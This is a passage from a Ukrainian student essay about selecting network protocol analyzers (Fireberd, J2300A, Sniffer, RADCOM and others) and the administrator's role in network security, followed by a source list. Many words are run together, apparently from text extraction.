    Цей критерій є визначальним при виборі пратіческі будь-якогообладнання. Однак було б правильніше розглядати співвідношення ціни танеобхідних функцій. Такий підхід до вибору аналізаторів протоколів єбільше виправданим, оскільки дозволяє платити гроші тільки за життєвонеобхідні функції, маючи можливість їх розширення в міру виникненняпотреб. Більшість розглянутих моделей знаходяться в одних ціновихрамках, тому при виборі аналізатора слід звертати увагу першвсього на схему ціноутворення.
    Найбільш виправданим є підхід мінімального базового комплектуапаратного і програмного забезпечення, який може бути доповненийнеобхідним і фізичними інтерфейсами і пакетами дешифрування або імітаціїпротоколів. Підводні камені в цьому випадку стануть технічні особливостікожного аналізатора. Зупинимося на одному показовому прикладі. Моделі
    Fireberd 500 для роботи з локальними мережами потрібні різні фізичніінтерфейси для Token Ring і Ethernet. Таким чином, щоб отриматиможливість аналізу будь-якої комбінації сегментів (Token Ring/Ethernet, Token
    Ring/Token Ring або Ethernet/Ethernet), замість двох потрібно чотирифізичних інтерфейсу аналізатора.

    Перспективи подальшого використання

    Кожен з представлених на ринку телекомунікацій аналізаторів протоколівмає свої переваги. Аналізатори Fireberd 300 і 500 підтримуютьстандарт RMON; J2300A і Sniffer мають вбудовану експертну систему;продукти компанії RADCOM, а також аналізатори Domino, DA-30 можутьнезалежно працювати з каналами локальних і розподілених мереж. Донедоліків аналізаторів слід віднести відсутність підтримки того чиіншого протоколу, що має велике значення для окремого випадку, але може бутивиправлено порівняно просто - оновленням програмного забезпечення.
    Виправлення недоліків, пов'язаних з апаратною базою аналізатора, вимагаєзаміни або доопрацювання самого пристрою. Тому при виборі аналізаторапротоколів завжди слід звертати увагу на сучасність йогоархітектури, а також його розширюваність і можливості застосування дощо розвиваються перспективним технологіям.

    ВИСНОВОК

    Для забезпечення захищеності мережі, недостатньо тільки встановленняапаратних і програмних засобів і вважати що ви захистилися від усього. Зкожним днем розробляються нові апаратні й програмні засоби.
    Технології та програми старіють на очах. Тим більше якщо у вашій мережівстановлені WWW, FTP, POP, SMTP сервера які працюють з реальними ipадресами і видно з «світу» при трасуванні, або відіславши «Пінг» завданнязахищеності знову ускладнюється.
    Найбільш відповідальним ланкою в забезпеченні захисту мережі єадміністратори мережі або як зараз часто вживають адміністратор збезпеки. Адміністратор повинен завжди?? ледіть за подіями в мережі,дивитися журнали подій, підключень, помилок а також стежити за трафіком.
    Найпоширенішими і високо захищеними ОС вважаються Unix/Linuxсистеми. А на цих системах приходиться робити все в ручну. Тут немає кнопкина яку можна натиснути, немає панелі управління де можна все налаштувати,тільки команди і пакети (RPM).
    Полегшують ці кропіткі роботи адміністраторів підвищенням ступенязахищеності та зручністю користування пристрої звані мережевимианалізаторами. Сучасні аналізатори протоколів WAN/LAN/ATM дозволяютьвиявити помилки в конфігурації маршрутизаторів і мостів; встановити типтрафіку, що пересилається з глобальної мережі; визначити який використовується діапазоншвидкостей, оптимізувати співвідношення між пропускною здатністю ікількістю каналів; локалізувати джерело неправильного трафіку; виконатитестування послідовних інтерфейсів і повне тестування АТМ;здійснити повний моніторинг і декодування основних протоколів з будь-якогоканалу; аналізувати статистику в реальному часі, включаючи аналіз трафікулокальних мереж через глобальні мережі.

    Список джерел:
    1. http://i2r.rusfund.ru/static/452/out_15653.shtml (Бібліотека I2R).

    2. http://www.osp.ru/lan/1999/12/008_print.htm (Ігор Іванцов)

    3. Журнал "LAN", # 12, 1999 рік// Видавництво "Відкриті Системи"

    4. http://www.opennet.ru

    5. Леонтьев Б.К. «Крэкинг без секретів». М: «Комп'ютерна література»,

    2001

         
     
         
    Реферат Банк
     
    Рефераты
     
    Бесплатные рефераты
     

     

     

     

     

     

     

     
     
     
      Все права защищены. Reff.net.ua - українські реферати ! DMCA.com Protection Status